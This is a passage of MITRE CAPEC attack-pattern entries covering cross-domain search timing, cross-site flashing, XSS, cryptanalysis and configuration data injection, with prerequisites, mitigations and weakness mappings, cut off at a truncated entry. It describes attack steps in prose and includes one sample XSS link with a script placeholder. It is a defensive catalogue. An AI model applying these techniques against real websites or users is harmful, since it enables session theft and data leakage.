2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-462: Cross-Domain Search Timing

Attack Pattern ID: 462

Abstraction: Detailed

View customized information:

Description

Extended Description

For GET requests an attacker could for instance leverage the "img" tag in conjunction with "onload() / onerror()" javascript events. For the POST requests, an attacker could leverage the "iframe" element and leverage the "onload()" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim's mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim's e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	54	Query System for Information

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Determine service to send cross domain requests to: The adversary first determines which service they will be sending the requests to

Experiment

Send and time various cross domain requests: Adversaries will send a variety of cross domain requests to the target, timing the time it takes for the target to respond. Although they won't be able to read the response, the adversary can use the time to infer information about what the service did upon receiving the request.

Techniques
Using a GET request, leverage the "img" tag in conjunction with "onload() / onerror()" javascript events to time a response
Using a POST request, leverage the "iframe" element and use the "onload()" event to time a response

Exploit

Infer information from the response time: After obtaining reponse times to various requests, the adversary will compare these times and infer potentially sensitive information. An example of this could be asking a service to retrieve information and random usernames. If one request took longer to process, it is likely that a user with that username exists, which could be useful knowledge to an adversary.
Techniques
Compare timing of different requests to infer potentially sensitive information about a target service

Prerequisites

Ability to issue GET / POST requests cross domainJava Script is enabled in the victim's browserThe victim has an active session with the site from which the attacker would like to receive informationThe victim's site does not protect search functionality with cross site request forgery (CSRF) protection

Skills Required

[Level: Low]

Some knowledge of Java Script

Resources Required

Ability to issue GET / POST requests cross domain

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Design: The victim's site could protect all potentially sensitive functionality (e.g. search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests

Design: The browser's security model could be fixed to not leak timing information for cross domain requests

Related Weaknesses

CWE-ID	Weakness Name
385	Covert Timing Channel
352	Cross-Site Request Forgery (CSRF)
208	Observable Timing Discrepancy

References

[REF-399] Chris Evans. "Cross-Domain Search Timing". 2009-12-11. <http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Consequences
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-178: Cross-Site Flashing

Attack Pattern ID: 178

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	182	Flash Injection
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	174	Flash Parameter Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Identification: Using a browser or an automated tool, an attacker records all instances of URLs (or partial URL such as domain) passed to a flash file (SWF).

Techniques
Use an automated tool to record the variables passed to a flash file.
Use a browser to manually explore the website and analyze how the flash file receive variables, e.g. JavaScript using SetVariable/GetVariable, HTML FlashVars param tag, etc.
Use decompilers to retrieve the flash source code and record all user-controllable variables passed to a loadMovie* directive.

Experiment

Attempt to inject a remote flash file: The attacker makes use of a remotely available flash file (SWF) that generates a uniquely identifiable output when executed inside the targeted flash file.
Techniques
Modify the variable of the SWF file that contains the remote movie URL to the attacker controlled flash file.

Exploit

Access or Modify Flash Application Variables: As the attacker succeeds in exploiting the vulnerability, they target the content of the flash application to steal variable content, password, etc.

Techniques
Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and loaded by the victim browser's flash plugin and sends document information to the attacker.
Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the flash application to execute appropriately.

Execute JavaScript in victim's browser: When the attacker targets the current flash application, they can choose to inject JavaScript in the client's DOM and therefore execute cross-site scripting attack.

Techniques
Develop malicious JavaScript that is injected from the rogue flash movie to the targeted flash application through vectors identified during the Experiment Phase and loaded by the victim's browser.

Prerequisites

The targeted Flash application must reference external URLs and the locations thus referenced must be controllable through parameters. The Flash application must fail to sanitize such parameters against malicious manipulation. The victim must follow a crafted link created by the attacker.

Skills Required

[Level: Medium]

knowledge of Flash internals, parameters and remote referencing.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Implementation: Only allow known URL to be included as remote flash movies in a flash application

Configuration: Properly configure the crossdomain.xml file to only include the known domains that should host remote flash movies.

Example Instances

The attacker tries to get their malicious flash movie to be executed in the targeted flash application. The malicious file is hosted on the attacker.com domain and the targeted flash application is hosted on example.com The crossdomain.xml file in the root of example.com allows all domains and no specific restriction is specified in the targeted flash application. When the attacker injects their malicious file in the vulnerable flash movie, the rogue flash application is able to access internal variables and parameter of the flash movie.

Related Weaknesses

CWE-ID	Weakness Name
601	URL Redirection to Untrusted Site ('Open Redirect')

References

[REF-41] Stefano Di Paola. "Testing Flash Applications". 2007. <http://www.wisec.it/en/Docs/flash_App_testing_Owasp07.pdf>.

[REF-42] "OWASP Web Security Testing Guide". Testing for Cross site flashing. The Open Web Application Security Project (OWASP). <https://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/08-Testing_for_Cross_Site_Flashing.html>.

[REF-561] "Cross-Site Flashing". Trustwave. <http://doc.cenzic.com/sadoc9x14ba847/CPL0001509.htm>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences, References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-63: Cross-Site Scripting (XSS)

Attack Pattern ID: 63

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	242	Code Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	588	DOM-Based XSS
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	591	Reflected XSS
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	592	Stored XSS
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	33	HTTP Request Smuggling
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	34	HTTP Response Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	85	AJAX Footprinting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	105	HTTP Request Splitting
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	174	Flash Parameter Injection
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	273	HTTP Response Smuggling
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	107	Cross Site Tracing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all links visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

Probe identified potential entry points for XSS vulnerability: The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

Techniques
Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
Use a proxy tool to record results of manual input of XSS probes in known URLs.
Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier.
Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier.

Exploit

Steal session IDs, credentials, page content, etc.: As the attacker succeeds in exploiting the vulnerability, they can choose to steal user's credentials in order to reuse or to analyze them later on.

Techniques
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.

Forceful browsing: When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).

Techniques
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).

Content spoofing: By manipulating the content, the attacker targets the information that the user would like to get from the website.

Techniques
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.

Prerequisites

Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser.

Skills Required

[Level: Low]

To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines.

[Level: High]

Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.

Resources Required

Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Integrity	Modify Data
Confidentiality	Read Data

Mitigations

Design: Use browser technologies that do not allow client side scripting.

Design: Utilize strict type, character, and encoding enforcement

Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.

Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.

Implementation: Perform input validation for all remote content.

Implementation: Perform output validation for all remote content.

Implementation: Session tokens for specific host

Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.

Example Instances

Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:

<a href="www.exampletrustedsite.com?Name=<script>maliciousscript</script>">Trusted Site</a>

When the user clicks the link, the appended script also executes on the local user's machine.

Related Weaknesses

CWE-ID	Weakness Name
79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
20	Improper Input Validation

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
08	Cross-Site Scripting

Relevant to the OWASP taxonomy mapping

Entry Name
Cross Site Scripting (XSS)

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Prerequisites, Description Summary, Examples-Instances, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances
Previous Entry Names
Change Date	Previous Entry Name
2017-05-01 (Version 2.10)	Simple Script Injection

CAPEC-97: Cryptanalysis

Attack Pattern ID: 97

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	192	Protocol Analysis
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	463	Padding Oracle Crypto Attack
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	608	Cryptanalysis of Cellular Encryption
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	20	Encryption Brute Forcing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext.

Exploit

An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key.

Prerequisites

The target software utilizes some sort of cryptographic algorithm.

An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext.

The encryption algorithm is known to the attacker.

An attacker has access to the ciphertext.

Skills Required

[Level: High]

Cryptanalysis generally requires a very significant level of understanding of mathematics and computation.

Resources Required

Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Use proven cryptographic algorithms with recommended key sizes.

Ensure that the algorithms are used properly. That means:

1. Not rolling out your own crypto; Use proven algorithms and implementations.
2. Choosing initialization vectors with sufficiently random numbers
3. Generating key material using good sources of randomness and avoiding known weak keys
4. Using proven protocols and their implementations.
5. Picking the most appropriate cryptographic algorithm for your usage context and data

Example Instances

A very easy to understand example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter "E" in an English language occurs with a certain known frequency (about 12.7%), whatever "E" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is inapplicable to modern cryptographic ciphers but is here to illustrate a rudimentary example of cryptanalysis.

Related Weaknesses

CWE-ID	Weakness Name
327	Use of a Broken or Risky Cryptographic Algorithm
1204	Generation of Weak Initialization Vector (IV)
1240	Use of a Cryptographic Primitive with a Risky Implementation
1241	Use of Predictable Algorithm in Random Number Generator
1279	Cryptographic Operations are run Before Supporting Units are Ready

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Cryptanalysis

References

[REF-556] "Wikipedia". Cryptanalysis. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Cryptanalysis>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Description, Description Summary, Examples-Instances, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Mitigations

CAPEC-608: Cryptanalysis of Cellular Encryption

Attack Pattern ID: 608

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	97	Cryptanalysis

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

None

Skills Required

[Level: Medium]

Adversaries can rent commercial supercomputer time globally to conduct cryptanalysis on encrypted data captured from mobile devices. Foreign governments have their own cryptanalysis technology and capabilities. Commercial cellular standards for encryption (GSM and CDMA) are also subject to adversary cryptanalysis.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Mitigations

Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.

Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption.

Related Weaknesses

CWE-ID	Weakness Name
327	Use of a Broken or Risky Cryptographic Algorithm

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns

CAPEC-536: Data Injected During Configuration

Attack Pattern ID: 536

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	176	Configuration/Environment Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Acquisition and Deployment, Sustainment

Execution Flow

Explore

Determine configuration process: The adversary, through a previously compromised system, either remotely or physically, determines what the configuration process is. They look at configuration files, data files, and running processes on the system to identify areas where they could inject malicious data.
Determine when configuration occurs: The adversary needs to then determine when configuration or recalibration of a system occurs so they know when to inject malicious data.
Techniques
Look for a weekly update cycle or repeated update schedule.
Insert a malicious process into the target system that notifies the adversary when configuration is occurring.

Experiment

Determine malicious data to inject: By looking at the configuration process, the adversary needs to determine what malicious data they want to insert and where to insert it.
Techniques
Add false log data
Change configuration files
Change data files

Exploit

Inject malicious data: Right before, or during system configuration, the adversary injects the malicious data. This leads to the system behaving in a way that is beneficial to the adversary and is often followed by other attacks.

Prerequisites

The attacker must have previously compromised the victim's systems or have physical access to the victim's systems.

Advanced knowledge of software and hardware capabilities of a manufacturer's product.

Skills Required

[Level: High]

Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system.

Mitigations

Ensure that proper access control is implemented on all systems to prevent unauthorized access to system files and processes.

Example Instances

An adversary wishes to bypass a security system to access an additional network segment where critical data is kept. The adversary knows that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. The adversary knows the bypass will work but also will be detected within the logging data of the security system. The adversary waits until an upgrade is performed to the security system by the victim's system administrators, and the adversary has access to an external logging system. The adversary injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an adversary bypass to be detected. The adversary stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The adversary is then able to bypass the security system.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Examples-Instances, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Examples-Instances, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Abstraction
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-277: Data Interchange Protocol Manipulation

Attack Pattern ID: 277

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	272	Protocol Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Related Weaknesses

CWE-ID	Weakness Name
707	Improper Neutralization

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-221: Data Serialization External Entities Blowup

Attack Pattern ID: 221

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
